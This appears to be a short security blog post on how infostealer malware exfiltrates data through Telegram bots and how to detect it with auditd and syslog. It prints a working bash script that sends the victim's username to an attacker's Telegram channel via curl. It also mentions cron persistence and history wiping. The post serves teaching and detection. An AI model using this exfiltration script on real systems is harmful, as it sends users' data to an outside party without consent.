One of the most prominent threats right now is Infostealers. These would be a kind of malware that captures information from devices and sends the stolen data to an attacker. While this technique is integrated in other attacks (f.e. ransomware) it could work on its own, for selling, cyber espionage and more.

In the past months, one of the most popular exfiltration attempts was done through Telegram or Discord bots (as well as C2-Command and Control attempts).

I've been asked a few times how this is done, so in this article, I'm creating a very simple example of how Telegram could be used to exfiltrate and how to detect that attempt. Let's go!

Telegram bot

In order to do this, a Telegram Bot and a Channel are required. You need to create a bot with the help of BotFather and then create a Channel and add the bot to it. Send a message to the Channel and then use the following to get the Channel info:

https://api.telegram.org/bot<BotToken>/getUpdates

As describedhere, this will allow you to get the Channel ID. Once you know the channel ID, you can send a message using:

curl 'https://api.telegram.org/bot<BotToken>/sendMessage?chat_id=<channelId>&text=<my message>'

Understanding this, we could create a script that enumerates the system information and sends a message describing it. Let's create a really simple example that just sends thewhoami output for the sake of the example. Of course, this could include waymore things such as architecture, disk info and more. Most of there sort of samples will attempt to also check crypto wallet info.

Anyway, let's say we have the following script:

#!/bin/bashmessa=$(whoami)mycommand="https://api.telegram.org/bot<BotToken>/sendMessage?chat_id=<channelId>&text=$messa"curl $mycommand

When this is executed, the username is sent to the channel.

Now, most of these will install the script incron usigncrontab and delete thehistory log.

In case thecrontab log is still intact, we will be able to see the crontab edition usingcat /var/log/syslog | grep -w 'crontab'. But let's explore a cool option:auditd

Now, installingauditd isfairly simple. And while you can create your own rules, you can also use adefault configuration and you are good to go!

Now, if we usesudo cat /var/log/audit/audit.log | grep telegram | grep api we would be able to see the attempt of our script!

Sometimes these attacks include messing up the/var/log so maybe having a backup in a different path could be useful, too.

Anyway, this was a simple, friendly introduction. Expect more complex attacks! (and simpler, too :) )

If you are curious about analyzing real life samples, take a look at my older posts aboutsetting a custom Linux Honeypot. Most of the things I capture are miners, which could use some common characteristics with info-stealers (messing up withcron for persistence, attempting enumeration, attemptingDynamic Linker Hijacking attack, and more).